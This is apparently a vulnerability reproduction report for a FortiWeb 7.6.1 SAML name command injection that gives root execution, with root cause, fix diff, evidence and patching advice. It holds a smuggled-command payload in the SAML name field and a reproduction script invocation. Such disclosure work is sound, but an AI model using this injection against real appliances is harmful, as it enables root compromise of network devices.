CVE-2025-58034 – SAML name command injection (root RCE)

CVE-2025-58034.md

FortiWeb CVE-2025-58034 – SAML name command injection (root RCE)

Summary

• Product / Component: FortiWeb 7.6.1 (Docker image fortiweb/fortiweb-swarm:latest) – SAML CLI handler (oper_user_saml_part_0 → saml_utils.sh)
• Impact: Authenticated admin can inject shell commands via SAML “name” and achieve root command execution on the appliance
• Introduced: Present in FortiWeb 7.6.1 (prior to vendor fix; exact commit not available)
• Fixed: Patched in FortiWeb 7.6.6 / 8.0.2 per FG-IR-25-513 (adds saml_name_check validation)
• Reproduction Status: Confirmed on FortiWeb-Docker 7.6.1, build1010(GA.F), running in the provided Lima/Docker context
• Customer Action: Upgrade to 7.6.6+ (or vendor-recommended fixed trains), restrict admin access paths, and monitor SAML configuration changes

Root Cause

The SAML configuration “name” is interpolated directly into a shell command that invokes saml_utils.sh via system/fwbsystem without validation. Because the CLI accepts backtick-wrapped names, an attacker can embed shell syntax that runs as root when the CLI executes the helper script.

# oper_user_saml_part_0 (invocation)
/bin/sh /data/etc/saml/shibboleth/saml_utils.sh -a addsp -i <name> ...
# <name> is taken verbatim from CLI input; no sanitization before execution

This allows crafting a SAML server name like `/bin/touch /tmp/pwn` to execute arbitrary commands as root on the appliance.

Fix Diff Highlights

Vendor fix (per advisory) adds saml_name_check to reject unsafe SAML names before constructing the saml_utils.sh command:

- saml_utils.sh -a addsp -i "$saml_name" ...
+ saml_name_check "$saml_name" || exit 1
+ saml_utils.sh -a addsp -i "$saml_name" ...

No upstream source diff was available in this bundle; guidance is based on FG-IR-25-513.

Release Status & History

1. 2025-11-20 – Reproduced on FortiWeb-Docker 7.6.1 build1010(GA.F); root-owned marker file created via SAML CLI name injection.
2. Vendor advisory FG-IR-25-513 – Fix shipped in 7.6.6 / 8.0.2 (date per vendor bulletin); earlier 7.6.0–7.6.5 remain vulnerable.

Reproduction

Prereqs: running FortiWeb container fortiweb-7-6-1 on Lima host (SSH on 38022), credentials admin / FortiWeb!123, sshpass installed.

# From bundle root:
cd repro
chmod +x reproduction_steps.sh
FORTIWEB_HOST=host.lima.internal FORTIWEB_SSH_PORT=38022 \
FORTIWEB_USERNAME=admin FORTIWEB_PASSWORD=FortiWeb!123 \
./reproduction_steps.sh

The script:

• Resolves reachable host (host.lima.internal or localhost)
• Sends SAML CLI payload via SSH to set name to `/bin/touch${IFS}/tmp/<marker>`
• Verifies root-owned marker with fnsysctl ls -l /tmp/<marker>
• Captures system status

Evidence

# ssh CLI transcript (repro/logs/repro.log)
... saml_utils.sh -a addsp ... (usage banner) ...
Failed to merge the SAML server's configurations.
Command fail. Invalid input value.
[+] SSH command exit status: 0

# Marker verification (repro/logs/marker_verification.log)
-rw-r--r--    1 0        0       ... /tmp/pcli176364935910647
[+] Root-owned marker file /tmp/pcli176364935910647 confirmed

# System status (FortiWeb build)
International Version: FortiWeb-Docker 7.6.1,build1010(GA.F),241126
Hostname: 1ee6302afefd

Recommendations

1. Patch: Upgrade FortiWeb to 7.6.6+ (or 8.0.2+). Do not run 7.6.0–7.6.5 in production.
2. Config: Restrict admin/CLI access (SSH and web “CLI Console”); monitor SAML name changes for shell metacharacters; disable SAML CLI operations where possible.
3. Defense-in-depth: Add WAF/IPS rules to block malformed SAML config names; alert on creation of unexpected files under /tmp on FortiWeb nodes; enforce MFA and network isolation for admin interfaces.